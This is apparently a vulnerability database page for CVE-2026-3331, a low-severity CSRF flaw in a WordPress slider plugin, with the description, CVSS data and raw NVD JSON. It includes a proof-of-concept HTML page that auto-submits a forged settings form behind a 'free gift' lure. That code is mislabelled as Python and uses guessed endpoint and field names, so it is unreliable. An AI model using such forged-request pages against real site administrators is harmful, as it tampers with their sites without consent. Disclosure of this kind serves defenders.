Security Vulnerability Report
中文
CVE-2026-3331 CVSS 4.3 MEDIUM

CVE-2026-3331

Published: 2026-03-21 04:17:19
Last Modified: 2026-04-24 16:27:44

Description

The Lobot Slider Administrator plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 0.6.0. This is due to missing or incorrect nonce validation on the fourty_slider_options_page function. This makes it possible for unauthenticated attackers to modify plugin slider-page configuration via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

WordPress Lobot Slider Administrator <= 0.6.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- Proof of Concept for CVE-2026-3331 --> <!-- This HTML page demonstrates the CSRF vulnerability by trying to change plugin settings --> <html> <body> <form action="http://target-wordpress-site.com/wp-admin/admin.php?page=lobot_slider_options" method="POST"> <input type="hidden" name="slider_setting" value="HACKED" /> <!-- Additional parameters can be added here based on actual plugin structure --> <input type="submit" value="Click here for free gift" /> </form> <script> // Automatically submit the form when the page loads or user interacts document.forms[0].submit(); </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-3331", "sourceIdentifier": "[email protected]", "published": "2026-03-21T04:17:19.090", "lastModified": "2026-04-24T16:27:44.277", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Lobot Slider Administrator plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 0.6.0. This is due to missing or incorrect nonce validation on the fourty_slider_options_page function. This makes it possible for unauthenticated attackers to modify plugin slider-page configuration via a forged request granted they can trick a site administrator into performing an action such as clicking on a link."}, {"lang": "es", "value": "El plugin Lobot Slider Administrator para WordPress es vulnerable a la falsificación de petición en sitios cruzados en versiones hasta la 0.6.0, inclusive. Esto se debe a la validación de nonce faltante o incorrecta en la función fourty_slider_options_page. Esto hace posible que atacantes no autenticados modifiquen la configuración de la página de control deslizante del plugin a través de una petición falsificada, siempre que puedan engañar a un administrador del sitio para que realice una acción como hacer clic en un enlace."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/lobot-slider-administrator/tags/0.6.0/lobot-slider-administrator.php#L33", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/lobot-slider-administrator/trunk/lobot-slider-administrator.php#L33", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7b7c9123-a918-4fc0-9b16-f537b418b990?source=cve", "source": "[email protected]"}]}}